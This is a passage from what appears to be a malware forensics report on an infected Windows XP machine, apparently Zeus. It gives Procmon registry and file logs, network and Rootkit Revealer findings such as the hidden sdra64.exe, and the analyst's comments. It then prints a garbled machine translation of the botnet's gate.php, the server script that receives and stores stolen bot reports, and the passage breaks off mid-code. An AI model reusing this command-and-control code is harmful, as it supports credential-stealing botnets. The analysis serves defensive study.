F0DE, SupportsObjects: True, VolumeLabel:

RegCreateKey HKCU\Software\Microsoft\SystemCertificates\MY SUCCESS Desired Access: All Access

RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Personal SUCCESS

Type: REG_EXPAND_SZ, Length: 54, Data: %USERPROFILE%\My Documents

RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local Settings SUCCESS

Type: REG_EXPAND_SZ, Length: 58, Data: %USERPROFILE%\Local Settings

RegQueryKey HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Query: Full,

SubKeys: 0, Values: 13

RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 0,

Name: ComSpec, Type: REG_EXPAND_SZ, Length: 60, Data: %SystemRoot%\system32\cmd.exe


Name: Path, Type: REG_EXPAND_SZ, Length: 124, Data:

%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem


Name: windir, Type: REG_EXPAND_SZ, Length: 26, Data: %SystemRoot%


Name: OS, Type: REG_SZ, Length: 22, Data: Windows_NT


Name: PROCESSOR_ARCHITECTURE, Type: REG_SZ, Length: 8, Data: x86


Name: PROCESSOR_LEVEL, Type: REG_SZ, Length: 4, Data: 6


Name: PROCESSOR_IDENTIFIER, Type: REG_SZ, Length: 96, Data: x86 Family 6 Model 23 Stepping 10, GenuineIntel


Name: PROCESSOR_REVISION, Type: REG_SZ, Length: 10, Data: 170a


Name: NUMBER_OF_PROCESSORS, Type: REG_SZ, Length: 4, Data: 1


Name: PATHEXT, Type: REG_SZ, Length: 98, Data: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH


Name: TEMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP


Name: TMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP


Name: FP_NO_HOST_CHECK, Type: REG_SZ, Length: 6, Data: NO

RegOpenKey HKCU\Volatile Environment SUCCESS Desired Access: Read

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ,

Length: 26, Data: \\XPWUPDATES

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length:

16, Data: Console

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ,

Length: 16, Data: Console

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98,

Data: C:\Documents and Settings\Kevin\Application Data

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length:

6, Data: C:

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length:

2, Data:

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length:

60, Data: \Documents and Settings\Kevin

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ,

Length: 26, Data: \\XPWUPDATES

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length:

16, Data: Console

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ,

Length: 16, Data: Console

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98,

Data: C:\Documents and Settings\Kevin\Application Data

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length:

6, Data: C:

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length:

2, Data:

RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length:

60, Data: \Documents and Settings\Kevin

QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name:

\WINDOWS\system32\verclsid.exe

Load Image C:\WINDOWS\system32\verclsid.exe SUCCESS Image Base: 0x1000000, Image Size: 0xb000

Load Image C:\WINDOWS\system32\ntdll.dll SUCCESS Image Base: 0x7c900000, Image Size: 0xb2000

QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name:

\WINDOWS\system32\verclsid.exe

CreateFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SHARING VIOLATION Desired Access:

Generic Read, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: None, AllocationSize: n/a

RegOpenKey HKLM\Software\Clients\Mail SUCCESS Desired Access: Query Value

RegQueryValue HKLM\SOFTWARE\Clients\Mail\(Default) SUCCESS Type: REG_SZ, Length: 32, Data: Outlook

Express

lsass.exe RegQueryValue

HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName SUCCESS Type:

REG_SZ, Length: 22,

Data: XPWUPDATES

HKLM\SAM\SAM\C SUCCESS Type: REG_BINARY, Length: 168,

Data: 07 00 01 00 00 00 00 00 98 00 00 00 02 00 01 00

HKLM\SAM\SAM\Domains\Account\V SUCCESS Type: REG_BINARY, Length: 296,

Data: 00 00 00 00 E0 00 00 00 02 00 01 00 E0 00 00 00

HKLM\SAM\SAM\Domains\Builtin\V SUCCESS Type: REG_BINARY, Length: 212,

Data: 00 00 00 00 98 00 00 00 02 00 01 00 98 00 00 00

HKLM\SAM\SAM\Domains\Account\Users\Names\Kevin\(Default) SUCCESS Type: <Unknown: 1003>, Length: 0

HKLM\SAM\SAM\Domains\Account\Users\000003EB\V SUCCESS Type: REG_BINARY, Length: 444,

Data: 00 00 00 00 BC 00 00 00 02 00 01 00 BC 00 00 00

RegQueryValue HKLM\SAM\SAM\Domains\Account\Users\000003EB\F SUCCESS Type: REG_BINARY, Length:

80,

Data: 02 00 01 00 00 00 00 00 B0 06 A1 4F D9 02 CC 01

HKLM\SECURITY\Policy\SecDesc\(Default) SUCCESS Type: REG_NONE, Length: 180,

Data: 01 00 04 80 98 00 00 00 A8 00 00 00 00 00 00 00

HKLM\SAM\SAM\Domains\Account\Users\Names\SUPPORT_388945a0\(Default) SUCCESS Type: <Unknown: 1002>,Length:

0

HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C SUCCESS Type: REG_BINARY, Length: 440,

Data: 20 02 00 00 00 00 00 00 98 00 00 00 02 00 01 00

HKLM\SAM\SAM\Domains\Account\Users\Names\HelpAssistant\(Default) SUCCESS Type: <Unknown: 1000>, Length: 0

HKLM\SAM\SAM\Domains\Account\Users\Names\Guest\(Default) SUCCESS Type: <Unknown: 501>, Length: 0

HKLM\SAM\SAM\Domains\Account\Users\Names\Administrator\(Default) SUCCESS Type: <Unknown: 500>, Length: 0

Explorer.exe

Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2376, Command line: /S /C {2559A1F4-

21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401

Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2444, Command line: /S /C {2559A1F5-

21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401

RegCreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS

Desired Access: Maximum Allowed

RegEnumKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace SUCCESS

Index: 0, Name: {1f4de370-d627-11d1-ba4f-00a0c91eedba}

RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-

8BBF40B640BF}\EnableDHCP SUCCESS Type: REG_DWORD, Length: 4, Data: 1


8BBF40B640BF}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688626


8BBF40B640BF}\DhcpServer SUCCESS Type: REG_SZ, Length: 32, Data: 255.255.255.255

RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-

0548AB912EF5}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688565


0548AB912EF5}\LeaseTerminatesTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303774965


0548AB912EF5}\DhcpServer SUCCESS Type: REG_SZ, Length: 24, Data: 192.168.1.1

svchost.exe

CreateFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Desired Access: Generic Write, Read

Attributes, Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: NNCI, ShareMode: Read,

Delete, AllocationSize: 0, OpenResult: Opened

CreateFile C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS Desired Access: Read Data/List

Directory, Execute/Traverse, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-

Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a, Impersonating: NT AUTHORITY\SYSTEM,

OpenResult: Opened

CreateFile C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Desired Access: Generic Read, Disposition:

Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, AllocationSize: n/a,

Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\system32\wbem SUCCESS Desired Access: Read EA, Read Attributes, Read Control,

Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT

AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\WinSxS SUCCESS Desired Access: Read EA, Read Attributes, Read Control,

Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT

AUTHORITY\SYSTEM, OpenResult: Opened

CreateFile C:\WINDOWS\WinSxS\X86_MICROSOFT.WINDOWS.COMMON-

CONTROLS_6595B64144CCF1DF_6.0.2600.6028_X-WW_61E65202 SUCCESS Desired Access: Read EA,

Read Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,


CreateFile C:\WINDOWS\Prefetch\WMIPRVSE.EXE-28F301A9.pf SUCCESS Desired Access: Generic

Read/Write, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode:

None, AllocationSize: 0, Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Overwritten

CreateFile C:\WINDOWS\Prefetch SUCCESS Desired Access: Synchronize, Disposition: Open, Options:

Directory, Synchronous IO Non-Alert, Open For Backup, Attributes: N, ShareMode: Read, Write, AllocationSize: n/a,


CreateFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS Desired Access: Generic Read/Write,

Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: H, ShareMode: Read, AllocationSize: 0,

OpenResult: Opened

CreateFile C:\WINDOWS\system32\lowsec\local.ds SUCCESS Desired Access: Generic Read, Disposition:

Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, AllocationSize: n/a,

OpenResult: Opened

CreateFile C:\WINDOWS\system32\config\systemprofile\Cookies\system@kerkvlietkj[1].txt SUCCESS

Desired Access: Generic Write, Read Attributes, Disposition: Create, Options: Synchronous IO Non-Alert, Non-

Directory File, Attributes: NCI, ShareMode: Read, Write, Delete, AllocationSize: 0, OpenResult: Created

CreateFile C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS Desired Access: Read EA, Read

Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,


FlushBuffersFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS

Process Create C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS PID: 3540, Command line:

C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

QueryOpen C:\WINDOWS\win.ini SUCCESS CreationTime: 8/23/2001 8:00:00 AM, LastAccessTime: 4/24/2011

8:03:01 PM, LastWriteTime: 3/23/2011 1:23:23 AM, ChangeTime: 3/23/2011 1:23:23 AM, AllocationSize: 520, EndOfFile: 519,

FileAttributes: A

QueryOpen C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS CreationTime: 3/22/2011 9:56:13 PM,

LastAccessTime: 4/24/2011 8:04:59 PM, LastWriteTime: 3/22/2011 9:56:13 PM, ChangeTime: 3/22/2011 9:56:13 PM,

AllocationSize: 4,096, EndOfFile: 749, FileAttributes: RHA

QueryOpen C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-

ww_61e65202\comctl32.dll SUCCESS CreationTime: 3/23/2011 9:15:46 PM, LastAccessTime: 4/24/2011 8:04:59

PM, LastWriteTime: 8/23/2010 12:12:02 PM, ChangeTime: 3/23/2011 10:15:32 PM, AllocationSize: 1,056,768, EndOfFile:

1,054,208, FileAttributes: A

QueryOpen C:\Documents and Settings\Kevin\Cookies\index.dat SUCCESS CreationTime: 3/22/2011 9:33:30 PM,

LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM, ChangeTime: 4/24/2011 8:03:51 PM,

AllocationSize: 32,768, EndOfFile: 32,768, FileAttributes: A

QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][2].TXT SUCCESS

CreationTime: 4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:22 PM, LastWriteTime: 4/24/2011 7:59:22 PM,

ChangeTime: 4/24/2011 7:59:22 PM, AllocationSize: 192, EndOfFile: 185, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@BING[1].TXT SUCCESS CreationTime:

4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:23 PM, LastWriteTime: 4/24/2011 7:59:23 PM, ChangeTime: 4/24/2011

7:59:23 PM, AllocationSize: 200, EndOfFile: 200, FileAttributes: ANCI

QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@GOOGLE[1].TXT SUCCESS



QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS CreationTime:

4/24/2011 7:44:41 PM, LastAccessTime: 4/24/2011 7:44:41 PM, LastWriteTime: 4/24/2011 7:44:41 PM, ChangeTime: 4/24/2011

7:44:41 PM, AllocationSize: 72, EndOfFile: 69, FileAttributes: ANCI







QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MICROSOFT[1].TXT SUCCESS



QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MOOKIE1[2].TXT SUCCESS






QueryOpen C:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat SUCCESS


ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 49,152, EndOfFile: 49,152, FileAttributes: A

QueryOpen C:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat SUCCESS


ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 425,984, EndOfFile: 425,984, FileAttributes: A

ReadFile C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR SUCCESS Offset: 327,680, Length: 8,192

ReadFile C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA SUCCESS Offset: 5,693,440,

Length: 8,192

RegCreateKey HKLM\Software\Microsoft\WBEM\CIMOM SUCCESS Desired Access: Read

RegCreateKey HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History

SUCCESS Desired Access: Read, Create Sub Key

RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Logging SUCCESS Type: REG_SZ, Length: 4,

Data: 1

RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size SUCCESS Type: REG_SZ,

Length: 12, Data: 65536

RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic

Provider\Image Path SUCCESS Type: REG_SZ, Length: 22, Data: rsaenh.dll

RegQueryValue HKLM\SYSTEM\Setup\SystemSetupInProgress SUCCESS Type: REG_DWORD, Length: 4, Data:

0

RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 001\Name SUCCESS

Type: REG_SZ, Length: 80, Data: Microsoft Strong Cryptographic Provider

RegQueryValue HKLM\SOFTWARE\Microsoft\COM3\REGDBVersion SUCCESS Type: REG_BINARY, Length:

8, Data: 07 00 00 00 00 00 00 00

RegQueryValue HKCR\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID SUCCESS Type:

REG_SZ, Length: 78, Data: {8BC3F05E-D86B-11D0-A075-00C04FB68820}

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:

REG_SZ, Length: 16, Data: winmgmt

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) SUCCESS Type:

REG_SZ, Length: 78, Data: Windows Management and Instrumentation

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:

REG_SZ, Length: 16, Data: winmgmt

RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission SUCCESS

Type: REG_BINARY, Length: 180, Data: 01 00 04 80 94 00 00 00 A4 00 00 00 00 00 00 00

WriteFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Offset: 13,965, Length: 91

WriteFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SUCCESS Offset: 0, Length: 28,186

WriteFile C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat SUCCESS Offset: 0, Length:

4,096, I/O Flags: Non-cached, Paging I/O, Synchronous Paging I/O

The WinMerge comparison shows that the files are completely different from before

and after. I then used a spreadsheet and filtered the results to find the Ŗafterŗ file items of

interest based on ŖProcess Nameŗ and ŖSuccessŗ value of the registry access result. From

inspection of the Procmon output it is evident that many registry keys being modified. A lot of

system files are being created. The output of WinMerge List dlls show those ones that were

created. Directories are being queried and MAC times of the files are being captured. The

Ŗverclsid.exeŗ is an open MS vulnerability9 that was published in 2006 and fixed with a

service pack. The Ŗwinlogon.exeŗ is being controlled by the malware Ŗfile sdra64.exe.ŗ With

the Ŗexplorer.exeŗ every directory on the system was queried and the contents of each folder

was made known. The same query was done for the volume information for the hard drive.

9 http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx

http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx

The Ŗexplorer.exeŗ registry key QueryNameInformationFile gave the details of the files on the

system. The Ŗexplorer.exeŗ RegQueryValue was returning numerous values to cover all the

important details of the computer system. The Ŗsvhost.exeŗ is usually where we would see the

application program running and there are a lot of system changes that occur under this

process.

WinMerge TCPView

Only showing the difference from the Ŗbeforeŗ and Ŗafterŗ.

svchost.exe 1572 UDP xpwupdates bootpc * * 3 903 svchost.exe 1144 TCP

xpwupdates.tampabay.rr.com 1301 host53.webserver.com http ESTABLISHED

2 1,074 2 442

Rootkit Revealer

HKLM\SECURITY\Policy\Secrets\SAC* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)

HKLM\SECURITY\Policy\Secrets\SAI* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)

C:\WINDOWS\system32\lowsec 4/24/2011 8:02 PM 0 bytes Hidden from Windows API.

C:\WINDOWS\system32\lowsec\local.ds 4/24/2011 8:02 PM 34.27 KB Hidden from Windows API.

C:\WINDOWS\system32\lowsec\user.ds 4/24/2011 7:41 PM 2.37 KB Hidden from Windows API.

C:\WINDOWS\system32\lowsec\user.ds.lll 3/23/2011 11:46 PM 1.34 KB Hidden from Windows API.

C:\WINDOWS\system32\sdra64.exe 4/24/2011 8:02 PM 290.00 KB Hidden from Windows API.

C:\WINDOWS\system32\sdra64.exe:Zone.Identifier 4/24/2011 8:02 PM 26 bytes Hidden from Windows API.

Inspection of the cp.php and gate.php

gate.php (Russian comments were translated with google translator online):

<? Php define ('__REPORT__', 1); / *

Gate.

Protocol bot <-> server represents a part bot - sending a report about something

a server-side - sending the changes in the settings (or teams). From the boat, at a time

sent information about one event / object. * /

if (@ $ _SERVER ['REQUEST_METHOD']! == 'POST') die (); require_once ('system / global.php');

require_once ('system / config.php');

/ / Get the data. $ Data = @ file_get_contents ('php: / / input');

$ Data_size = @ strlen ($ data);

if ($ data_size <HEADER_SIZE + ITEM_HEADER_SIZE) die (); $ Data = RC4 ($ data, BOTNET_CRYPTKEY);

/ / Verefikatsiya. If the same MD5, it makes no sense to check something else. if (strcmp (md5 (substr ($ data, HEADER_SIZE), true), substr ($ data, HEADER_MD5, 16))! == 0) die ();

/ / Parses the data (Data compression is not supported). / / Congratulations mega hackers, this algorithm will allow you to easily read from a bot. Do not forget to write a parser 18 and 100

backdoors.

$ List = array (); for ($ i = HEADER_SIZE; $ i <$ data_size;)

{

$ K = @ unpack ('L4', @ substr ($ data, $ i, ITEM_HEADER_SIZE)); $ List [$ k [1]] = @ substr ($ data, $ i + ITEM_HEADER_SIZE, $ k [3]);

$ I + = (ITEM_HEADER_SIZE + $ k [3]);

}

unset ($ data);

/ / The main parameters that should always be. if (empty ($ list [SBCID_BOT_VERSION]) | | empty ($ list [SBCID_BOT_ID])) die ();

/ / Connect to the database. if (! ConnectToDB ()) die ();

////////////////////////////////////////////////// / / Process the data.

////////////////////////////////////////////////// //////////////////////////////////////////////////

$ Bot_id = str_replace ("\ x01", "\ x02", trim ($ list [SBCID_BOT_ID]));

$ Bot_id_q = addslashes ($ bot_id);

$ Botnet = (empty ($ list [SBCID_BOTNET]))? DEFAULT_BOTNET: str_replace ("\ x01", "\ x02", trim ($ list [SBCID_BOTNET]));

$ Botnet_q = addslashes ($ botnet);

$ Bot_version = ToUint ($ list [SBCID_BOT_VERSION]); $ Real_ipv4 = trim ((! Empty ($ _GET ['ip'])? $ _GET ['Ip']: $ _SERVER ['REMOTE_ADDR']));

$ Country = GetCountryIPv4 (); / / str_replace ("\ x01", "\ x02", GetCountryIPv4 ());

$ Country_q = addslashes ($ country); $ Curtime = time ();

$ Rtime_min_online = $ curtime - BOTNET_TIMEOUT; / / minimum time for which the bot is online.

/ / Report on execution of the script.

if (! empty ($ list [SBCID_SCRIPT_ID]) & & isset ($ list [SBCID_SCRIPT_STATUS], $ list [SBCID_SCRIPT_RESULT]) & &

strlen ($ list [SBCID_SCRIPT_ID]) == 16) {

if (! @ mysql_query ("INSERT INTO botnet_scripts_stat SET bot_id = '{$ bot_id_q}', bot_version = {$ bot_version}, rtime = {$

curtime},". "Extern_id = '". Addslashes ($ list [SBCID_SCRIPT_ID ])."',".

"Type =". (ToInt ($ list [SBCID_SCRIPT_STATUS]) == 0? 2: 3 ).",". "Report = '". Addslashes ($ list [SBCID_SCRIPT_RESULT ])."'")) die ();

}

/ / Write log / files. else if (! empty ($ list [SBCID_BOTLOG]) & &! empty ($ list [SBCID_BOTLOG_TYPE]))

{

$ Type = ToInt ($ list [SBCID_BOTLOG_TYPE]);

if ($ type == BLT_FILE)

{ / / Extensions, which are remote start.

$ Bad_exts = array ('. Php3', '. Php4', '. Php5', '. Php', '. Asp', '. Aspx', '. Exe', '. Pl', '. Cgi', '. cmd', '. bat', '. phtml', '. phtm');

$ Fd_hash = 0; $ Fd_size = strlen ($ list [SBCID_BOTLOG]);

/ / Generate the file name. if (IsHackNameForPath ($ bot_id) | | IsHackNameForPath ($ botnet)) die ();

$ File_root = REPORTS_PATH. '/ Files /'. Urlencode ($ botnet ).'/'. urlencode ($ bot_id);

$ File_path = $ file_root;

$ Last_name ='';

$ L = explode ('/', (isset ($ list [SBCID_PATH_DEST]) & & strlen ($ list [SBCID_PATH_DEST])> 0? Str_replace ('\ \', '/', $ list [SBCID_PATH_DEST]): 'unknown '));

foreach ($ l as & $ k)

{ if (IsHackNameForPath ($ k)) die ();

$ File_path .='/'.($ last_name = urlencode ($ k));

} if (strlen ($ last_name) === 0) $ file_path .= '/ unknown.dat';

unset ($ l);

/ / Check extension, and specify the file mask.

if (($ ext = strrchr ($ last_name,'.')) === false | | in_array (strtolower ($ ext), $ bad_exts)! == false) $ file_path .= '. dat';

$ Ext_pos = strrpos ($ file_path,'.');

/ / FIXME: If the name is too long.

if (strlen ($ file_path)> 180) $ file_path = $ file_root. '/ longname.dat';

/ / Add the file.

for ($ i = 0; $ i <9999; $ i + +)

{

if ($ i == 0) $ f = $ file_path;

else $ f = substr_replace ($ file_path,'('.$ i.').', $ ext_pos, 1);

if (file_exists ($ f))

{ if ($ fd_size == filesize ($ f))

{

if ($ fd_hash === 0) $ fd_hash = md5 ($ list [SBCID_BOTLOG], true); if (strcmp (md5_file ($ f, true), $ fd_hash) === 0) break;

}

} else

{

if (! CreateDir (dirname ($ file_path)) | |! ($ h = fopen ($ f, 'wb'))) die ();

flock ($ h, LOCK_EX);

fwrite ($ h, $ list [SBCID_BOTLOG]); flock ($ h, LOCK_UN);

fclose ($ h);

break;

}

} }

else

{ / / Write to the base.

if (REPORTS_TO_DB === 1)

{ $ Table = 'botnet_reports_'. Gmdate ('ymd', $ curtime);

$ Query = "INSERT DELAYED INTO {$ table} SET bot_id = '{$ bot_id_q}', botnet = '{$ botnet_q}', bot_version = {$ bot_version}, type = {$ type}, country = '{$ country_q } ', rtime = {$ curtime}, ".

"Path_source = '". (Empty ($ list [SBCID_PATH_SOURCE])?'': Addslashes ($ list [SBCID_PATH_SOURCE ]))."',".

"Path_dest = '". (Empty ($ list [SBCID_PATH_DEST])?'': Addslashes ($ list [SBCID_PATH_DEST ]))."',". "Time_system =". (Empty ($ list [SBCID_TIME_SYSTEM])? 0: ToUint ($ list [SBCID_TIME_SYSTEM ])).",".

"Time_tick =". (Empty ($ list [SBCID_TIME_TICK])? 0: ToUint ($ list [SBCID_TIME_TICK ])).",".

"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: ToInt ($ list [SBCID_TIME_LOCALBIAS ])).",".

"Os_version = '". (Empty ($ list [SBCID_OS_INFO])?'': Addslashes ($ list [SBCID_OS_INFO ]))."',".

"Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ])).",".

"Process_name = '". (Empty ($ list [SBCID_PROCESS_NAME])?'': Addslashes ($ list [SBCID_PROCESS_NAME ]))."',". "Process_user = '". (Empty ($ list [SBCID_PROCESS_USER])?'': Addslashes ($ list [SBCID_PROCESS_USER ]))."',".

"Ipv4 = '". addslashes ($ real_ipv4 )."',".

"Context = '". addslashes ($ list [SBCID_BOTLOG ])."'";

/ / I think this arrangement improves performance.

if (! @ mysql_query ($ query) & & (! @ mysql_query ("CREATE TABLE IF NOT EXISTS {$ table} LIKE botnet_reports") | |! @ mysql_query ($ query))) die ();

}

/ / Write to file.

if (REPORTS_TO_FS === 1) {

if (IsHackNameForPath ($ bot_id) | | IsHackNameForPath ($ botnet)) die ();

$ File_path = REPORTS_PATH. '/ Other /'. Urlencode ($ botnet ).'/'. urlencode ($ bot_id); if (! CreateDir ($ file_path) | |! ($ h = fopen ($ file_path. '/ reports.txt', 'ab'))) die ();

flock ($ h, LOCK_EX); fwrite ($ h, str_repeat ("=", 1980). "\ r \ n".

"Bot_id = {$ bot_id} \ r \ n".

"Botnet = {$ botnet} \ r \ n". "Bot_version =". IntToVersion ($ bot_version). "\ R \ n".

"Ipv4 = {$ real_ipv4} \ r \ n".

"Country = {$ country} \ r \ n". "Type = {$ type} \ r \ n".

"Rtime =". gmdate ('H: i: s d.m.Y', $ curtime). "\ r \ n".

"Time_system =". (Empty ($ list [SBCID_TIME_SYSTEM])? 0: gmdate ('H: i: s dmY', ToInt ($ list [SBCID_TIME_SYSTEM ])))." \ r \ n ". / / Time () also returns a int .

"Time_tick =". (Empty ($ list [SBCID_TIME_TICK])? 0: TickCountToTime (ToUint ($ list [SBCID_TIME_TICK]) /

1000)). "\ R \ n".

"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: TimeBiasToText (ToInt ($ list

[SBCID_TIME_LOCALBIAS ])))." \ r \ n ".

"Os_version =". (Empty ($ list [SBCID_OS_INFO])?'': OSDataToString ($ list [SBCID_OS_INFO ]))." \ r \ n ". "Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ]))." \ r \ n ".

"Process_name =". (Empty ($ list [SBCID_PROCESS_NAME])?'': $ List [SBCID_PROCESS_NAME]). "\ R \ n".

"Process_user =". (Empty ($ list [SBCID_PROCESS_USER])?'': $ List [SBCID_PROCESS_USER]). "\ R \ n". "Path_source =". (Empty ($ list [SBCID_PATH_SOURCE])?'': $ List [SBCID_PATH_SOURCE]). "\ R \ n".

"Context = \ r \ n". $ List [SBCID_BOTLOG]. "\ R \ n \ r \ n \ r \ n");

flock ($ h, LOCK_UN); fclose ($ h);

}

if (REPORTS_JN === 1) IMNotify ($ type, $ list, $ bot_id); }

}

/ / Report on online status. else if (! empty ($ list [SBCID_BOT_STATUS]))

{

/ / Standard request. $ Query = "bot_id = '{$ bot_id_q}', botnet = '{$ botnet_q}', bot_version = {$ bot_version}, country = '{$ country_q}', rtime_last =

{$ curtime},".

"Net_latency =". (Empty ($ list [SBCID_NET_LATENCY])? 0: ToUint ($ list [SBCID_NET_LATENCY ])).",".

